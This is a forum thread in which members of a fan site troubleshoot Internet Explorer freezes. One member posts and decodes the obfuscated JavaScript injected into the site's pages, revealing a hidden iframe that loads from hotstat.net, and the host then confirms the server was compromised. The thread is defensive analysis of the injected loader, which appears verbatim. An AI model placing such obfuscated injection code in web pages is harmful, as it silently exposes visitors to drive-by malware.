I've noticed that I can't seem to access PPT through IE currently. My husband also is having this issue on a separate computer. It keeps popping up some sort of script text box, and then locking up the browser window. I finally ended up using my husband's computer and Firefox to put up the new Anime Versus, because IE locked up, and I couldn't get Netscape to allow me to put in poll options (it kept giving some sort of post error whenever I tried to add the second option).

Am I the only person having these issues?

IE is all I use, and it's working fine for me.

I'm seeing the same error when I'm using Netscape 8 in IE mode (I'm usually in Firefox mode) so it's not only you seeing the error.

Our fault somewhere down the line.

All PPT's php output seems to get appended at the end:
Code:
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%6B%29%7B%76%61%72%20%6B%31%3D%75%6E%65%73%63%61%70%65%28%6B%2E%73%75%62%73%74%72%28%30%2C%6B%2E%6C%65%6E%67%74%68%2d%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%6B%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%6B%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2d%6B%2E%73%75%62%73%74%72%28%6B%2E%6C%65%6E%67%74%68%2d%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('-%3BK%7Bkzqx%7C-%3A8tivo%7Diom-%3BLri%7Ei%7Bkzqx%7C-%3BMlwk%7Dumv%7C6%7Fzq%7Cm-%3A@-%3A%3A-%3BKlq%7E-%3A8%7B%7C%81tm-%3BL-%3DK-%3A%3Alq%7Bxti%81-%3BIvwvm-%3DK-%3A%3A-%3BM-%3BKqnzium-%3A8%7Bzk-%3BLp%7C%7Cx-%3BI77pw%7C%7B%7Ci%7C6vm%7C7k%82j7mvoqvm6xpx-%3BM-%3BK7qnzium-%3BM-%3BK7lq%7E-%3BM-%3A%3A-%3AA-%3BJ-%3BK7%7Bkzqx%7C-%3BM8')</script>

decode that and get
Code:
<script>function dF(k){var k1=unescape(k.substr(0,k.length-1)); var t='';for(i=0;i<k1.length;i++)t+=String.fromCharCode(k1.charCodeAt(i)-k.substr(k.length-1,1));document.write(unescape(t));}</script>'));dF('-;K{kzqx|-:8tivo}iom-;Lri~i{kzqx|-;Mlwk}umv|6zq|m-:@-::-;Klq~-:8{|tm-;L-=K-::lq{xti-;Ivwvm-=K-::-;M-;Kqnzium-:8{zk-;Lp||x-;I77pw|{|i|6vm|7k‚j7mvoqvm6xpx-;M-;K7qnzium-;M-;K7lq~-;M-::-:A-;J-;K7{kzqx|-;M8

and decode that to get
Code:
<script language=javascript>document.write("<div style=\"display:none\"><iframe src=http://hotstat.net/c)+(3b/engine.php></iframe></div>");</script>

The question is, what are we doing with hotstat.net?

(Too tired atm, probably need to bug Yukio.)

There's a one-line summary at the top for those who don't.

Ah, I thought the problem was on my end. That error would pop up and IE would freeze until I shut it down. The site seems to be working fine in Opera and Firefox though.

Using IE6 (sp2) and it works at the moment -- perhaps you need to update IE to get rid of that error?

(Not that this should be happening. We'll be working on removing that.)

Actually, I'm using IE 6 (sp2), and checked it again after you posted that and still got the error. Odd.

Weirdness. If you want to access PPT with IE, you can probably add http://www.pinkpt.com to the Restricted Sites list (Tools -> Internet Options -> Security). That'd cut down on the features somewhat (no javascripts), but at the same time should fix your problem.

Ok now this is weird.

Thanks for the screen shot Mylene and thanks for the analysis Hunter. I also want to thank everyone else for being so quick on the up take.

I've had a chat today with the hosts and this is what they had to say:

Quote:
Yukio: Hi guys, I'm getting script prompts on my website for some reason when accessing via IE... have you guys had reports from any of your clients of similar things?
Fred G: what is the prompt?
Yukio: its a weird pop up box
Yukio: with chiense lettering in it
Fred G: hmm where can I reproduce the error please
Yukio: visit http://www.pinkpt.com in IE
Yukio: heres a screen shot http://home.insightbb.com/~ralight/Error.jpg
Yukio: a site member says it may be something to do with php output.. "The question is, what are we doing with hotstat.net?"
Fred G: it seems that your file was compromised with a javascript
Fred G: I suggest that you submit a ticket
Yukio: all the sites on the server seem compromised
Fred G: please submti a ticket
Fred G: we will check on it

Hold onto your seats people... the SL is back.
